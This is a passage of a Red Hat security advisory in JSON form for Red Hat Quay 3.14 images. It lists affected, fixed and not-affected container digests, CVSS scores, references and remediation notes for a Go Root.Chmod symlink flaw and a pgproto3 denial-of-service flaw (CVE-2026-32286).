          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root"
    },
    {
      "cve": "CVE-2026-32286",
      "cwe": {
        "id": "CWE-1285",
        "name": "Improper Validation of Specified Index, Position, or Offset in Input"
      },
      "discovery_date": "2026-03-26T20:01:59.226117+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2451847"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the DataRow.Decode function within the github.com/jackc/pgproto3/v2 component. A malicious or compromised PostgreSQL server can exploit this by sending a DataRow message containing a negative field length. This improper validation of field lengths leads to a \"slice bounds out of range panic\", resulting in a Denial of Service (DoS) for the affected application.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "github.com/jackc/pgproto3/v2: github.com/jackc/pgproto3/v2: Denial of Service via malicious PostgreSQL server",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "The PostgreSQL server multicluster-globalhub-manager connects to is either provisioned by the operator itself or specified by the admin managing the deployment. To successfully exploit the vulnerability in this context the attacker would need to compromise the operator-deployed PostgreSQL server to force a crafted malicious DataRow message or they would need to have the privileges required to modify the operator-provisioned deployment or configure globalhub-manager to use a compromised/malicious \u201cBYO Postgres\u201d server.\n\nThe first scenario (compromising a legitimate PostgreSQL server) would change Attack Complexity from Low to High resulting in an adjusted CVSS v3.1 score of 5.9 (Moderate)\nThe other scenarios (manipulating the operator provisioned-deployment or configuring the globalhub-manager to use a malicious server) would maintain AC:L but would require privileged access. This would change Privileges Required from None to High resulting in an adjusted CVSS v3.1 score of 4.9 (Moderate)\n\nBased on the above the Impact Rating for multicluster-globalhub-manager-rhel9 is  Moderate.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
          "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32286"
        },
        {
          "category": "external",
          "summary": "RHBZ#2451847",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2451847"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32286",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32286"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32286",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32286"
        },
        {
          "category": "external",
          "summary": "https://github.com/golang/vulndb/issues/4518",
          "url": "https://github.com/golang/vulndb/issues/4518"
        },
        {
          "category": "external",
          "summary": "https://github.com/jackc/pgx/issues/2507",
          "url": "https://github.com/jackc/pgx/issues/2507"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4518",
          "url": "https://pkg.go.dev/vuln/GO-2026-4518"
        }
      ],
      "release_date": "2026-03-26T19:40:51.974000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-26T17:12:40+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11458",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:21017"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:4dcd3b60f93e03d7d59e7dedc2ffcaa835de53ce672a179527f26ffe295473d2_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:7a0ec7eb2f7e1cd78834a108c84edb7f3a9f769209ba98b8bb0d1f7d66344e72_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c36f983f25aad87857f89920f0878fb081f9c55d471e98fa25a3af0507da4b42_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/clair-rhel8@sha256:c82534a20a7a5e2ecd49ac6307df13ede380c8b3d7ca4c6978aed1efab9c6ae4_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:36377e0f89e28bb05dd45c424ac336b2884e91267a118763ddd9a1e8d8f75295_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:087c088a5f5da9a54608fd93bbc47654b7c24661dfcdf3b64d04d496924a5e4b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:0e7f72c6427b9c941a765470683c3cfe81644bd0337b88c5f3d9021978aa38de_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:496e288875b50bb6f5ff1f92cd95a8df52ee02e97178e4134fcc3fc0b829f3b1_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:bc8584dbad964920db04fb5fa27044cb0219f7d736da16abe5deec2fb3d7b1a8_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1fa815f5c0f997f55ca2db83575360f084d0ead955e62adcb7b4f0b53b1a01c7_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:532d123f74a39a92346daf91d69f2eebc97d48d49cf89b21ec4114824cb23b2d_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:b83c36737a574a3454d1be87b9bb7a513eab7b5071c662fde05e791ec2596ee2_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:e76507eecc44ee17c66566769ff427c561df85db700c2b16ead0ecd894f40b9f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:052bf6483aa0e3cfae7cc28822bb05b7ebf1c2dd2019bae53874db19a7ced51f_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:0f209a6799f9eb6987d9479fc6631d3f6dabdf89faa0059c9c62010f4f46e2ba_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:eade47dd4e39ed346f9ea867a90e07fc70ff2ff4a6cce4a21ac77f88e9abad10_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-builder-rhel8@sha256:fac5b4a10d565051251ec328df69026458ede4dadc48b401dcb923979bf96b88_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:9e026e4b86da6a0719b0bf6973d465cd542ead1715afb516e5e37ae8d9057964_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-bundle@sha256:a620b5e2749ad150d7ee07bd240f29a69ad2593a522869bd334441e9fb346e0e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:6753b3d04a0cbf3ae35f8141df96505f099a39645ae3e68ae0b417ac572be64e_ppc64le",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:85c3bbf75379da98fbffe5ea1c53893a11ce42939d68687f16a0b687a9ba4b33_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:9fc318dd2650e6f3b68084e2f155a5485395026cba186018f6a2d5e70284bb6a_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-operator-rhel8@sha256:db535f8a5dea4124ee8140a48362d0a631cc19158a3944f0059219a5c7b44e3e_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:4ae7d2d72a2370bd5401f570e21386bc9a6df0b145030060c922fcf754c7839b_s390x",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:9f5d146fc72a09d9067705a35274a251708cebc4c6a7e50615bdbce3e128c097_amd64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:a46c3fd8bb72616f07d2fb47eae9b060ea6c5135ec365d7ddc0dc18054da0b1b_arm64",
            "Red Hat Quay 3.14:registry.redhat.io/quay/quay-rhel8@sha256:fca718bcd95971e571d13f9139e2f40c2daeca9605c669d73ed3055d9e3a53e2_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "products": [
